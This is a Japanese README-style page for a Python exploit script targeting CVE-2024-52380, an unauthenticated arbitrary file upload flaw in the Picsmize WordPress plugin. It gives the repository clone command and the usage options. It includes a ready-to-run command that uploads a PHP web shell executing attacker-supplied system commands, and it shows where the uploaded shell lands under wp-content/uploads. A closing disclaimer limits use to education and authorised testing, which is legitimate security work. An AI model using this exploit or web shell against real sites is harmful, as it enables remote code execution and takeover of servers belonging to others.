
WordPress用Picsmizeプラグインは、任意のファイルアップロードに対して脆弱です。
WordPress用Picsmizeプラグインは、任意のファイルアップロードに対して脆弱です。
このスクリプトは、WordPress用のPicsmizeプラグインにおける脆弱性(CVE-2024-52380)を悪用し、認証されていない攻撃者が任意のファイルをアップロードできるようにします。この脆弱性は、Picsmizeの1.0.0までの全バージョンに存在します。この脆弱性を悪用すると、ターゲットサーバー上でリモートコード実行が発生する可能性があります。
requestsライブラリ(pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
このスクリプトは、使いやすさのために2つのコマンドライン引数を提供します。
-u / --url (必須):
-u http://example.com
-c / --content (オプション):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: WordPressサイトのルートディレクトリ。wp-content/uploads: WordPressにおけるメディアアップロードのデフォルトディレクトリ。2025/01: このディレクトリ構造は、サーバーの日付設定に基づく年(2025年)と月(1月)に対応しています。http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
このスクリプトは、教育目的および許可されたセキュリティテスト専用です。所有していない、またはテストする明示的な許可を得ていないシステムに対するこのツールの不正使用は、違法かつ非倫理的です。